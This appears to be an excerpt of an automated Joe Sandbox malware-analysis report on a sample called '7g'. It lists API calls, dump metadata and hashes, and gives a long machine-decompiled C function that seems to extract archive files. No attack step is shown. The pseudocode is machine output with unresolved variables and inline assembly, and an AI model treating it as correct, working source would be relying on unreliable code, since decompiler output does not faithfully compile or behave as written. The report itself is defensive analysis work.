                                                                                                    0x00417e2a
                                                                                                    0x00417e39
                                                                                                    0x00417e46
                                                                                                    0x00417e46
                                                                                                    0x00417e48
                                                                                                    0x00417e48
                                                                                                    0x00417e4c
                                                                                                    0x00417e6c
                                                                                                    0x00417e6c
                                                                                                    0x00417e6e
                                                                                                    0x00417e70
                                                                                                    0x00417e77
                                                                                                    0x00417e77
                                                                                                    0x00000000
                                                                                                    0x00417e72
                                                                                                    0x00417e4f
                                                                                                    0x00417e57
                                                                                                    0x00417e66
                                                                                                    0x00000000
                                                                                                    0x00417e66
                                                                                                    0x00417e59
                                                                                                    0x00417e5d
                                                                                                    0x00417e5f
                                                                                                    0x00417e5f
                                                                                                    0x00000000
                                                                                                    0x00417e5d
                                                                                                    0x00417e3b
                                                                                                    0x00417e3f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00417e41
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,00000000,003C9765), ref: 00417E2A
                                                                                                    • GetLastError.KERNEL32(?,00000000,003C9765), ref: 00417E3B
                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,003C9765), ref: 00417E4F
                                                                                                    • GetLastError.KERNEL32(?,00000000,003C9765), ref: 00417E59
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$ChangeCloseFindNotificationObjectSingleWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 414953474-0
                                                                                                    • Opcode ID: 54bb8f346d6b3a6d1e42d23d99e378cac42b5c182b6e7c0d15da7775df448c51
                                                                                                    • Instruction ID: f23652dfd03f76d2a804693c371fccf7a3815858942e3d351f342f93a1a7d59a
                                                                                                    • Opcode Fuzzy Hash: 54bb8f346d6b3a6d1e42d23d99e378cac42b5c182b6e7c0d15da7775df448c51
                                                                                                    • Instruction Fuzzy Hash: 1BF05E7170830287DB305AB99CC4E9766E8AF55774F2007B7F921C23D0EB68DC818A28
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003D0D11 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 722COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 86%
                                                                                                    			E003D0D11(intOrPtr __ecx, intOrPtr __edx) {
				void* __ebx;
				signed int _t425;
				signed int* _t427;
				signed int _t428;
				intOrPtr* _t433;
				signed int _t434;
				intOrPtr* _t435;
				intOrPtr _t449;
				signed int _t452;
				void* _t456;
				signed int _t463;
				signed int _t465;
				signed char _t470;
				signed int _t472;
				signed int _t477;
				signed int _t481;
				signed int _t488;
				signed int _t493;
				signed int _t495;
				signed int _t504;
				intOrPtr _t506;
				void* _t514;
				signed int _t516;
				signed int _t518;
				signed int _t522;
				signed char _t526;
				void* _t532;
				intOrPtr* _t539;
				signed int _t543;
				signed int _t551;
				signed int _t554;
				void* _t560;
				signed int* _t570;
				signed int _t572;
				signed int _t583;
				signed int _t614;
				intOrPtr* _t623;
				intOrPtr* _t638;
				signed int _t654;
				signed int _t655;
				char* _t671;
				signed int _t679;
				intOrPtr _t681;
				void* _t694;
				signed int _t696;
				signed int _t697;
				intOrPtr* _t699;
				signed int _t702;
				signed int _t703;
				void* _t705;
				signed int _t711;
				signed int _t713;
				void* _t714;

				E0041F1B0(E0042497D, _t714);
				_t570 =  *(_t714 + 0x30);
				_t570[0xc] = 0;
				_t570[0xa] = 0;
				_t570[8] = 0;
				_t570[6] = 0;
				_t570[4] = 0;
				_t570[2] = 0;
				 *_t570 = 0;
				 *((intOrPtr*)(_t714 - 0xb0)) = __edx;
				 *((intOrPtr*)(_t714 - 0x34)) = __ecx;
				_t570[0xd] = 0;
				_t570[0xb] = 0;
				_t570[9] = 0;
				_t570[7] = 0;
				_t570[5] = 0;
				_t570[3] = 0;
				_t570[1] = 0;
				 *(_t714 - 0x30) = 0;
				 *(_t714 - 0x2c) = 0;
				 *((intOrPtr*)(_t714 - 0x40)) = 0;
				 *(_t714 - 0x3c) = 0;
				 *((intOrPtr*)(_t714 - 0x38)) = 0;
				_t425 =  *(_t714 + 0x18);
				 *(_t714 - 4) = 0;
				if( *((char*)(_t425 + 0x3c)) == 0) {
					_t425 =  *( *((intOrPtr*)(_t714 + 0xc)) + 4);
					 *(_t714 - 0x1c) = _t425;
				} else {
					 *(_t714 - 0x1c) = 1;
				}
				 *(_t714 - 0x18) = 0;
				if( *(_t714 - 0x1c) <= 0) {
					L9:
					_t696 =  *(_t714 - 0x1c);
					 *(_t714 - 0x20) = 0;
					if(_t696 != 0) {
						 *(_t714 - 0x20) = E003B1E0C();
					}
					 *(_t714 - 4) = 3;
					if(_t696 > 0) {
						_t654 =  *(_t714 - 0x1c);
						_t705 =  *(_t714 - 0x20);
						_t655 = _t654 >> 2;
						memset(_t705 + _t655, memset(_t705, 0, _t655 << 2), (_t654 & 0x00000003) << 0);
					}
					_push(0x200);
					_t427 = E003B1E0C();
					 *(_t714 + 0x30) = _t427;
					_t732 = _t427;
					 *(_t714 - 4) = 4;
					if(_t427 == 0) {
						_t711 = 0;
						__eflags = 0;
					} else {
						_t543 = E003C2E4C(_t427, _t732); // executed
						_t711 = _t543;
					}
					_t697 = 0;
					 *(_t714 - 4) = 3;
					 *(_t714 - 0x114) = _t711;
					if(_t711 != 0) {
						 *((intOrPtr*)( *_t711 + 4))(_t711);
					}
					_t428 =  *(_t714 + 0x18);
					 *(_t714 - 4) = 5;
					 *((intOrPtr*)(_t711 + 0x174)) =  *((intOrPtr*)(_t428 + 0x10));
					 *((char*)(_t714 + 0x33)) =  *(_t714 - 0x1c) - 1 > 0;
					 *(_t711 + 0x35) =  *(_t711 + 0x35) & 0x00000000;
					 *(_t714 - 0x14) =  *(_t428 + 8);
					 *(_t711 + 0x1a8) = _t697;
					 *((char*)(_t711 + 0x40)) =  *((intOrPtr*)(_t714 + 0x33));
					 *(_t711 + 0x1a0) = _t697;
					 *(_t711 + 0x198) = _t697;
					 *(_t711 + 0x190) = _t697;
					 *(_t711 + 0x188) = _t697;
					 *(_t711 + 0x44) =  *(_t714 - 0x14);
					 *((intOrPtr*)(_t711 + 0x48)) =  *((intOrPtr*)(_t428 + 0xc));
					 *(_t711 + 0x1ac) = _t697;
					 *(_t711 + 0x1a4) = _t697;
					 *(_t711 + 0x19c) = _t697;
					 *(_t711 + 0x194) = _t697;
					 *(_t711 + 0x18c) = _t697;
					L003D1886(_t711,  *(_t714 + 0x28));
					if( *((char*)(_t714 + 0x33)) == 0) {
						L28:
						 *(_t714 - 0xd) =  *(_t714 - 0xd) & 0x00000000;
						__eflags =  *(_t714 - 0x1c) - _t697;
						 *(_t714 - 0x28) = _t697;
						 *(_t714 - 0x24) = _t697;
						 *(_t714 - 0x18) = _t697;
						if( *(_t714 - 0x1c) <= _t697) {
							L84:
							__eflags =  *((char*)(_t714 + 0x33));
							if( *((char*)(_t714 + 0x33)) != 0) {
								L86:
								_t433 =  *((intOrPtr*)(_t714 + 0x24));
								_t434 =  *((intOrPtr*)( *_t433 + 0xc))(_t433,  *(_t714 - 0x30),  *(_t714 - 0x2c));
								__eflags = _t434 - _t697;
								 *(_t714 + 0x18) = _t434;
								if(_t434 == _t697) {
									_t435 =  *((intOrPtr*)(_t714 + 0x24));
									_t436 =  *((intOrPtr*)( *_t435 + 0x10))(_t435, _t714 - 0x28);
									__eflags = _t436 - _t697;
									 *(_t714 + 0x18) = _t436;
									if(_t436 == _t697) {
										L110:
										 *(_t714 - 4) = 3;
										_t570[8] =  *(_t711 + 0x188);
										_t570[9] =  *(_t711 + 0x18c);
										_t570[0xa] =  *(_t711 + 0x190);
										_t570[0xb] =  *(_t711 + 0x194);
										_t570[0xc] =  *(_t711 + 0x198);
										_t570[0xd] =  *(_t711 + 0x19c);
										_t570[2] =  *(_t711 + 0x1a0);
										_t570[3] =  *(_t711 + 0x1a4);
										_t570[4] =  *(_t711 + 0x1a8);
										_t570[5] =  *(_t711 + 0x1ac);
										__eflags = _t711 - _t697;
										 *_t570 =  *( *((intOrPtr*)(_t714 + 0xc)) + 4);
										_t570[1] = _t697;
										_t449 =  *((intOrPtr*)(_t711 + 0x180));
										_t570[6] =  *(_t449 + 0x20);
										_t436 =  *(_t449 + 0x24);
										_t570[7] =  *(_t449 + 0x24);
										L111:
										if(__eflags != 0) {
											_t436 =  *((intOrPtr*)( *_t711 + 8))(_t711);
										}
										goto L113;
									}
									__eflags = _t711 - _t697;
									 *(_t714 - 4) = 3;
									if(_t711 != _t697) {
										_t436 =  *((intOrPtr*)( *_t711 + 8))(_t711);
									}
									_t697 =  *(_t714 + 0x18);
									goto L113;
								}
								__eflags = _t711 - _t697;
								 *(_t714 - 4) = 3;
								if(_t711 != _t697) {
									_t436 =  *((intOrPtr*)( *_t711 + 8))(_t711);
								}
								_t697 =  *(_t714 + 0x18);
								goto L113;
							}
							__eflags =  *(_t714 - 0xd);
							if( *(_t714 - 0xd) == 0) {
								goto L110;
							}
							goto L86;
						} else {
							goto L29;
						}
						do {
							L29:
							_t456 =  *(_t714 - 0x20);
							_t583 =  *(_t714 - 0x18);
							__eflags =  *((char*)(_t456 + _t583));
							if( *((char*)(_t456 + _t583)) != 0) {
								goto L82;
							}
							E003C33E3(_t711);
							_t699 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t714 + 0xc)))) +  *(_t714 - 0x18) * 4));
							E003B64DB(_t714 - 0x94);
							E003B2D47(_t714 - 0x6c);
							_t463 =  *(_t714 + 0x18);
							 *(_t714 - 4) = 6;
							__eflags =  *((char*)(_t463 + 0x3c));
							if( *((char*)(_t463 + 0x3c)) == 0) {
								_t465 = E003B695D(_t714 - 0x94,  *_t699, 1); // executed
								__eflags = _t465;
								if(_t465 == 0) {
									L103:
									_t572 = E003B7253();
									_push( *(_t714 + 0x2c));
									_push(_t572);
									_t436 = E003B1E40(L003D18D0("Cannot find archive file", _t699, __eflags),  *((intOrPtr*)(_t714 - 0x6c)));
									__eflags = _t711;
									 *(_t714 - 4) = 3;
									if(_t711 != 0) {
										_t436 =  *((intOrPtr*)( *_t711 + 8))(_t711);
									}
									_t697 = _t572;
									goto L113;
								}
								_t470 =  *(_t714 - 0x74) >> 4;
								__eflags = _t470 & 0x00000001;
								if((_t470 & 0x00000001) != 0) {
									goto L103;
								}
								L34:
								_t472 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t714 + 0x20))))))( *_t699,  *((intOrPtr*)( *(_t714 + 0x18) + 0x3f))); // executed
								__eflags = _t472;
								 *(_t714 - 0x14) = _t472;
								if(_t472 != 0) {
									_t436 = E003B1E40(_t472,  *((intOrPtr*)(_t714 - 0x6c)));
									__eflags = _t711;
									 *(_t714 - 4) = 3;
									if(_t711 != 0) {
										_t436 =  *((intOrPtr*)( *_t711 + 8))(_t711);
									}
									_t697 =  *(_t714 - 0x14);
									goto L113;
								}
								L003D1784(_t714 - 0x110);
								_push( *((intOrPtr*)(_t714 - 0xb0)));
								 *(_t714 - 4) = 7;
								L003D1E3C(_t714 - 0x5c);
								 *(_t714 - 4) = 8;
								E003D16ED(_t714 - 0x16c);
								_t477 =  *(_t714 + 0x18);
								 *(_t714 - 0x13c) =  *(_t714 - 0x13c) & 0x00000000;
								 *(_t714 - 4) = 9;
								 *((intOrPtr*)(_t714 - 0x12c)) = _t477 + 0x40;
								 *((intOrPtr*)(_t714 - 0x16c)) =  *((intOrPtr*)(_t714 - 0x34));
								 *((intOrPtr*)(_t714 - 0x144)) = _t714 - 0x5c;
								 *((intOrPtr*)(_t714 - 0x140)) =  *((intOrPtr*)(_t714 + 8));
								 *((char*)(_t714 - 0x128)) =  *((intOrPtr*)(_t477 + 0x3c));
								E003B2F2F(_t714 - 0x124, _t699);
								_t481 = L003DCAA9(_t714 - 0x110, __eflags, _t714 - 0x16c,  *((intOrPtr*)(_t714 + 0x1c)));
								__eflags = _t481;
								 *(_t714 - 0x14) = _t481;
								if(_t481 != 0) {
									L38:
									__eflags =  *(_t714 - 0x14) - 0x80004004;
									if( *(_t714 - 0x14) == 0x80004004) {
										E003B1E40(_t481,  *((intOrPtr*)(_t714 - 0x124)));
										 *(_t714 - 4) = 7;
										L003D1EAB(_t714 - 0x5c);
										 *(_t714 - 4) = 6;
										_t436 = E003B1E40(L003D1830(_t570, _t714 - 0x110),  *((intOrPtr*)(_t714 - 0x6c)));
										__eflags = _t711;
										 *(_t714 - 4) = 3;
										if(_t711 != 0) {
											_t436 =  *((intOrPtr*)( *_t711 + 8))(_t711);
										}
										_t697 = 0x80004004;
										goto L113;
									}
									L39:
									_t488 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t714 + 0x20)))) + 4))( *((intOrPtr*)(_t714 - 0x34)), _t714 - 0x110,  *_t699,  *(_t714 - 0x14));
									__eflags = _t488;
									 *(_t714 - 0xa8) = _t488;
									if(_t488 != 0) {
										E003B1E40(_t488,  *((intOrPtr*)(_t714 - 0x124)));
										 *(_t714 - 4) = 7;
										L003D1EAB(_t714 - 0x5c);
										 *(_t714 - 4) = 6;
										_t436 = E003B1E40(L003D1830(_t570, _t714 - 0x110),  *((intOrPtr*)(_t714 - 0x6c)));
										__eflags = _t711;
										 *(_t714 - 4) = 3;
										if(_t711 != 0) {
											_t436 =  *((intOrPtr*)( *_t711 + 8))(_t711);
										}
										_t697 =  *(_t714 - 0xa8);
										goto L113;
									}
									__eflags =  *(_t714 - 0x14) - _t488;
									if( *(_t714 - 0x14) == _t488) {
										_t614 =  *(_t714 + 0x18);
										__eflags =  *(_t614 + 0x10);
										if( *(_t614 + 0x10) != 0) {
											__eflags =  *((char*)(_t614 + 0x3c));
											if(__eflags == 0) {
												_t209 = _t711 + 0x178; // 0x178
												E003C2A22( *_t699, _t209, __eflags);
												_t614 =  *(_t714 + 0x18);
											}
										}
										_t493 =  *(_t714 - 0x10c);
										__eflags = _t493;
										if(_t493 == 0) {
											L56:
											__eflags =  *((char*)(_t614 + 0x3c));
											if( *((char*)(_t614 + 0x3c)) != 0) {
												L70:
												_t679 =  *(_t714 + 0x18);
												__eflags =  *((char*)(_t679 + 0x3c));
												_t495 =  *( *((intOrPtr*)(_t714 - 0x110)) +  *(_t714 - 0x10c) * 4 - 4);
												if( *((char*)(_t679 + 0x3c)) != 0) {
													L73:
													__eflags = 0;
													L74:
													__eflags = 0;
													 *((char*)(_t495 + 0x4f)) = 0;
													if(0 != 0) {
														 *((intOrPtr*)(_t495 + 0x44)) =  *((intOrPtr*)(_t714 - 0x7c));
														_t283 = _t495 + 0x4e;
														 *_t283 =  *(_t495 + 0x4e) & 0x00000000;
														__eflags =  *_t283;
														 *((intOrPtr*)(_t495 + 0x48)) =  *((intOrPtr*)(_t714 - 0x78));
														 *((short*)(_t495 + 0x4c)) = 0x17;
													}
													__eflags =  *(_t714 + 0x28);
													 *((char*)(_t714 - 0xac)) = _t495 & 0xffffff00 | __eflags != 0x00000000;
													_push(_t714 - 0xa4);
													_push( *(_t714 + 0x2c));
													_push(_t711);
													_push( *((intOrPtr*)(_t714 + 0x24)));
													asm("adc ecx, [ebp-0x90]");
													_push( *((intOrPtr*)(_t714 + 0x20)));
													_push( *((intOrPtr*)(_t714 - 0xac)));
													_push(_t679);
													_push( *((intOrPtr*)(_t714 + 0x14)));
													_push( *(_t714 - 0xf4));
													_push( *(_t714 - 0xf8) +  *(_t714 - 0x94)); // executed
													_t500 = E003D193F( *((intOrPtr*)(_t714 - 0x34)), _t714 - 0x110, __eflags); // executed
													_t697 = _t500;
													__eflags = _t697;
													if(_t697 != 0) {
														goto L99;
													} else {
														_t504 =  *(_t714 + 0x18);
														__eflags =  *((char*)(_t504 + 0x3c));
														if( *((char*)(_t504 + 0x3c)) != 0) {
															_t681 =  *((intOrPtr*)(_t714 - 0xa4));
														} else {
															_t681 =  *(_t714 - 0xf8) +  *(_t714 - 0x94);
															asm("adc edi, [ebp-0x90]");
															 *((intOrPtr*)(_t714 - 0xa4)) = _t681;
															 *(_t714 - 0xa0) =  *(_t714 - 0xf4);
														}
														 *(_t714 - 0x28) =  *(_t714 - 0x28) + _t681;
														_t313 = _t711 + 0x180; // 0x180
														_t623 = _t313;
														asm("adc [ebp-0x24], edi");
														 *((intOrPtr*)( *_t623 + 0x20)) =  *((intOrPtr*)( *_t623 + 0x20)) + _t681;
														asm("adc [eax+0x24], edi");
														_t506 =  *_t623;
														 *(_t506 + 0x28) =  *(_t711 + 0x1a0);
														 *(_t506 + 0x2c) =  *(_t711 + 0x1a4);
														_t507 =  *(_t714 + 0x2c);
														__eflags =  *(_t507 + 4);
														if( *(_t507 + 4) != 0) {
															E003B1E40(_t507,  *((intOrPtr*)(_t714 - 0x124)));
															 *(_t714 - 4) = 7;
															L003D1EAB(_t714 - 0x5c);
															 *(_t714 - 4) = 6;
															_t436 = E003B1E40(L003D1830(_t570, _t714 - 0x110),  *((intOrPtr*)(_t714 - 0x6c)));
															__eflags = _t711;
															 *(_t714 - 4) = 3;
															if(_t711 != 0) {
																_t436 =  *((intOrPtr*)( *_t711 + 8))(_t711);
															}
															_t697 = 0x80004005;
															goto L113;
														} else {
															L81:
															E003B1E40(_t507,  *((intOrPtr*)(_t714 - 0x124)));
															 *(_t714 - 4) = 7;
															L003D1EAB(_t714 - 0x5c);
															 *(_t714 - 4) = 6;
															_t514 = L003D1830(_t570, _t714 - 0x110); // executed
															 *(_t714 - 4) = 5;
															E003B1E40(_t514,  *((intOrPtr*)(_t714 - 0x6c)));
															goto L82;
														}
													}
												}
												__eflags =  *((char*)(_t714 - 0x6f));
												if( *((char*)(_t714 - 0x6f)) != 0) {
													goto L73;
												}
												_push(1);
												_pop(0);
												goto L74;
											}
											__eflags =  *(_t714 - 0x100);
											if( *(_t714 - 0x100) == 0) {
												goto L70;
											}
											_t516 =  *(_t714 - 0xf4);
											 *(_t714 - 0x14) =  *(_t714 - 0x14) & 0x00000000;
											__eflags =  *(_t714 - 0x100);
											_t702 =  *(_t714 - 0xf8);
											 *(_t714 - 0x98) = _t516;
											if( *(_t714 - 0x100) <= 0) {
												L64:
												__eflags = _t702 | _t516;
												if((_t702 | _t516) == 0) {
													goto L70;
												}
												_t703 = _t702 +  *(_t714 - 0x30);
												asm("adc eax, [ebp-0x2c]");
												__eflags = _t516;
												if(__eflags > 0) {
													L69:
													_t638 =  *((intOrPtr*)(_t714 + 0x24));
													 *(_t714 - 0x30) = _t703;
													 *(_t714 - 0x2c) = _t516;
													_t697 =  *((intOrPtr*)( *_t638 + 0xc))(_t638, _t703, _t516);
													__eflags = _t697;
													if(_t697 != 0) {
														goto L99;
													}
													goto L70;
												}
												if(__eflags < 0) {
													L68:
													_t703 = 0;
													_t516 = 0;
													__eflags = 0;
													goto L69;
												}
												__eflags = _t703;
												if(_t703 >= 0) {
													goto L69;
												}
												goto L68;
											} else {
												goto L59;
											}
											do {
												L59:
												_t518 = E003D0CC8( *((intOrPtr*)( *((intOrPtr*)(_t714 - 0x104)) +  *(_t714 - 0x14) * 4)));
												__eflags = _t518;
												if(_t518 >= 0) {
													__eflags = _t518 -  *(_t714 - 0x18);
													if(_t518 >  *(_t714 - 0x18)) {
														 *((char*)( *(_t714 - 0x20) + _t518)) = 1;
														_t702 = _t702 -  *((intOrPtr*)( *((intOrPtr*)(_t714 - 0x40)) + _t518 * 8));
														asm("sbb [ebp-0x98], eax");
													}
												}
												 *(_t714 - 0x14) =  *(_t714 - 0x14) + 1;
												__eflags =  *(_t714 - 0x14) -  *(_t714 - 0x100);
											} while ( *(_t714 - 0x14) <  *(_t714 - 0x100));
											_t516 =  *(_t714 - 0x98);
											goto L64;
										} else {
											_t522 =  *( *((intOrPtr*)( *((intOrPtr*)(_t714 - 0x110)) + _t493 * 4 - 4)) + 0x3c);
											__eflags = _t522;
											if(_t522 < 0) {
												goto L56;
											}
											_t526 =  *( *( *((intOrPtr*)( *((intOrPtr*)(_t714 - 0x16c)) + 8)) + _t522 * 4)) >> 0x0000000d & 0x00000001;
											__eflags = _t526;
											 *(_t714 - 0x4d) = _t526;
											if(_t526 == 0) {
												goto L56;
											}
											__eflags =  *((char*)(_t614 + 0x3f));
											if(__eflags != 0) {
												E003B2E5F(_t714 - 0x4c, __eflags,  *(_t714 + 0x18) + 0x30);
												__eflags =  *(_t714 - 0x48);
												 *(_t714 - 4) = 0xa;
												if(__eflags != 0) {
													L54:
													E003B8274(_t714 - 0x4c);
													L55:
													_t235 = _t711 + 0x1b0; // 0x1b0
													_t532 = E003B2F2F(_t235, _t714 - 0x4c);
													 *(_t714 - 4) = 9;
													E003B1E40(_t532,  *((intOrPtr*)(_t714 - 0x4c)));
													_t614 =  *(_t714 + 0x18);
													goto L56;
												}
												E003B6141( *_t699, _t714 - 0x4c, __eflags);
												__eflags =  *(_t714 - 0x48);
												if( *(_t714 - 0x48) == 0) {
													goto L55;
												}
												goto L54;
											}
											_t697 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t714 + 0x20)))) + 4))( *((intOrPtr*)(_t714 - 0x34)), _t714 - 0x110,  *_t699, 0x80004001);
											__eflags = _t697;
											if(_t697 != 0) {
												L99:
												E003B1E40(_t500,  *((intOrPtr*)(_t714 - 0x124)));
												 *(_t714 - 4) = 7;
												L003D1EAB(_t714 - 0x5c);
												 *(_t714 - 4) = 6;
												_t436 = E003B1E40(L003D1830(_t570, _t714 - 0x110),  *((intOrPtr*)(_t714 - 0x6c)));
												 *(_t714 - 4) = 3;
												__eflags = _t711;
												goto L111;
											}
											goto L41;
										}
									}
									L41:
									_t507 =  *(_t714 + 0x18);
									 *(_t714 - 0xd) = 1;
									__eflags =  *((char*)(_t507 + 0x3c));
									if( *((char*)(_t507 + 0x3c)) == 0) {
										_t507 =  *(_t714 - 0x94);
										 *(_t714 - 0x28) =  *(_t714 - 0x28) +  *(_t714 - 0x94);
										asm("adc [ebp-0x24], ecx");
									}
									goto L81;
								}
								__eflags =  *((intOrPtr*)(_t714 - 0xd4)) - _t481;
								if( *((intOrPtr*)(_t714 - 0xd4)) < _t481) {
									goto L39;
								}
								 *(_t714 - 0x14) = 1;
								goto L38;
							}
							E003B64DB(_t714 - 0x94);
							 *(_t714 - 0x94) = 0;
							 *(_t714 - 0x90) = 0;
							 *(_t714 - 0x74) = 0;
							goto L34;
							L82:
							 *(_t714 - 0x18) =  *(_t714 - 0x18) + 1;
							__eflags =  *(_t714 - 0x18) -  *(_t714 - 0x1c);
						} while ( *(_t714 - 0x18) <  *(_t714 - 0x1c));
						_t697 = 0;
						__eflags = 0;
						goto L84;
					} else {
						_t539 =  *((intOrPtr*)(_t714 + 0x24));
						_t436 =  *((intOrPtr*)( *_t539 + 0xc))(_t539,  *(_t714 - 0x30),  *(_t714 - 0x2c));
						 *(_t714 - 0x14) = _t436;
						if(_t436 == _t697) {
							goto L28;
						}
						 *(_t714 - 4) = 3;
						if(_t711 != _t697) {
							_t436 =  *((intOrPtr*)( *_t711 + 8))(_t711);
						}
						_t697 =  *(_t714 - 0x14);
						L113:
						E003B1E40(E003B1E40(_t436,  *(_t714 - 0x20)),  *((intOrPtr*)(_t714 - 0x40)));
						_t452 = _t697;
						goto L114;
					}
				} else {
					do {
						E003B64DB(_t714 - 0x94);
						E003B2D47(_t714 - 0x6c);
						_t551 =  *(_t714 + 0x18);
						 *(_t714 - 4) = 1;
						 *(_t714 - 0x94) = 0;
						 *(_t714 - 0x90) = 0;
						_t724 =  *((char*)(_t551 + 0x3c));
						if( *((char*)(_t551 + 0x3c)) != 0) {
							goto L8;
						}
						E003B2E5F(_t714 - 0x4c, _t724,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t714 + 0xc)))) +  *(_t714 - 0x18) * 4)));
						 *(_t714 - 4) = 2;
						_t560 = E003B695D(_t714 - 0x94,  *((intOrPtr*)(_t714 - 0x4c)), 1); // executed
						if(_t560 == 0) {
							_t713 = E003B7253();
							_t694 = _t714 - 0x4c;
							_push( *(_t714 + 0x2c));
							_t671 = "Cannot find archive file";
							_push(_t713);
							L19:
							E003B1E40(E003B1E40(E003B1E40(L003D18D0(_t671, _t694, __eflags),  *((intOrPtr*)(_t714 - 0x4c))),  *((intOrPtr*)(_t714 - 0x6c))),  *((intOrPtr*)(_t714 - 0x40)));
							_t452 = _t713;
							L114:
							 *[fs:0x0] =  *((intOrPtr*)(_t714 - 0xc));
							return _t452;
						}
						_t567 =  *(_t714 - 0x74) >> 4;
						if(( *(_t714 - 0x74) >> 0x00000004 & 0x00000001) != 0) {
							_push( *(_t714 + 0x2c));
							_t713 = 0x80004005;
							_t694 = _t714 - 0x4c;
							_t671 = "The item is a directory";
							_push(0x80004005);
							goto L19;
						} else {
							 *(_t714 - 4) = 1;
							E003B1E40(_t567,  *((intOrPtr*)(_t714 - 0x4c)));
						}
						L8:
						 *(_t714 - 0x98) =  *(_t714 - 0x90);
						L00403F6D(_t714 - 0x40);
						_t554 =  *(_t714 - 0x3c);
						 *(_t714 - 0x3c) =  *(_t714 - 0x3c) + 1;
						 *( *((intOrPtr*)(_t714 - 0x40)) + _t554 * 8) =  *(_t714 - 0x94);
						 *( *((intOrPtr*)(_t714 - 0x40)) + 4 + _t554 * 8) =  *(_t714 - 0x98);
						 *(_t714 - 0x30) =  *(_t714 - 0x30) +  *(_t714 - 0x94);
						asm("adc [ebp-0x2c], ecx");
						 *(_t714 - 4) =  *(_t714 - 4) & 0x00000000;
						E003B1E40( *(_t714 - 0x94),  *((intOrPtr*)(_t714 - 0x6c)));
						 *(_t714 - 0x18) =  *(_t714 - 0x18) + 1;
						_t425 =  *(_t714 - 0x18);
					} while (_t425 <  *(_t714 - 0x1c));
					goto L9;
				}
			}
























































                                                                                                    0x003d0d16
                                                                                                    0x003d0d22
                                                                                                    0x003d0d28
                                                                                                    0x003d0d2b
                                                                                                    0x003d0d2e
                                                                                                    0x003d0d31
                                                                                                    0x003d0d34
                                                                                                    0x003d0d37
                                                                                                    0x003d0d3a
                                                                                                    0x003d0d3d
                                                                                                    0x003d0d43
                                                                                                    0x003d0d46
                                                                                                    0x003d0d49
                                                                                                    0x003d0d4c
                                                                                                    0x003d0d4f
                                                                                                    0x003d0d52
                                                                                                    0x003d0d55
                                                                                                    0x003d0d58
                                                                                                    0x003d0d5b
                                                                                                    0x003d0d5e
                                                                                                    0x003d0d61
                                                                                                    0x003d0d64
                                                                                                    0x003d0d67
                                                                                                    0x003d0d6a
                                                                                                    0x003d0d6d
                                                                                                    0x003d0d74
                                                                                                    0x003d0d82
                                                                                                    0x003d0d85
                                                                                                    0x003d0d76
                                                                                                    0x003d0d76
                                                                                                    0x003d0d76
                                                                                                    0x003d0d8b
                                                                                                    0x003d0d8e
                                                                                                    0x003d0e6b
                                                                                                    0x003d0e6b
                                                                                                    0x003d0e6e
                                                                                                    0x003d0e73
                                                                                                    0x003d0e85
                                                                                                    0x003d0e85
                                                                                                    0x003d0e8a
                                                                                                    0x003d0e8e
                                                                                                    0x003d0e90
                                                                                                    0x003d0e93
                                                                                                    0x003d0e9a
                                                                                                    0x003d0ea4
                                                                                                    0x003d0ea4
                                                                                                    0x003d0ea6
                                                                                                    0x003d0eab
                                                                                                    0x003d0eb1
                                                                                                    0x003d0eb4
                                                                                                    0x003d0eb6
                                                                                                    0x003d0eba
                                                                                                    0x003d0f14
                                                                                                    0x003d0f14
                                                                                                    0x003d0ebc
                                                                                                    0x003d0ebe
                                                                                                    0x003d0ec3
                                                                                                    0x003d0ec3
                                                                                                    0x003d0f16
                                                                                                    0x003d0f18
                                                                                                    0x003d0f1e
                                                                                                    0x003d0f24
                                                                                                    0x003d0f29
                                                                                                    0x003d0f29
                                                                                                    0x003d0f2c
                                                                                                    0x003d0f36
                                                                                                    0x003d0f43
                                                                                                    0x003d0f49
                                                                                                    0x003d0f4d
                                                                                                    0x003d0f51
                                                                                                    0x003d0f57
                                                                                                    0x003d0f5d
                                                                                                    0x003d0f63
                                                                                                    0x003d0f69
                                                                                                    0x003d0f6f
                                                                                                    0x003d0f75
                                                                                                    0x003d0f7d
                                                                                                    0x003d0f80
                                                                                                    0x003d0f83
                                                                                                    0x003d0f89
                                                                                                    0x003d0f8f
                                                                                                    0x003d0f95
                                                                                                    0x003d0f9b
                                                                                                    0x003d0fa1
                                                                                                    0x003d0faa
                                                                                                    0x003d0fd8
                                                                                                    0x003d0fd8
                                                                                                    0x003d0fdc
                                                                                                    0x003d0fdf
                                                                                                    0x003d0fe2
                                                                                                    0x003d0fe5
                                                                                                    0x003d0fe8
                                                                                                    0x003d1471
                                                                                                    0x003d1471
                                                                                                    0x003d1475
                                                                                                    0x003d1481
                                                                                                    0x003d1484
                                                                                                    0x003d148d
                                                                                                    0x003d1490
                                                                                                    0x003d1492
                                                                                                    0x003d1495
                                                                                                    0x003d1619
                                                                                                    0x003d1623
                                                                                                    0x003d1626
                                                                                                    0x003d1628
                                                                                                    0x003d162b
                                                                                                    0x003d1643
                                                                                                    0x003d1649
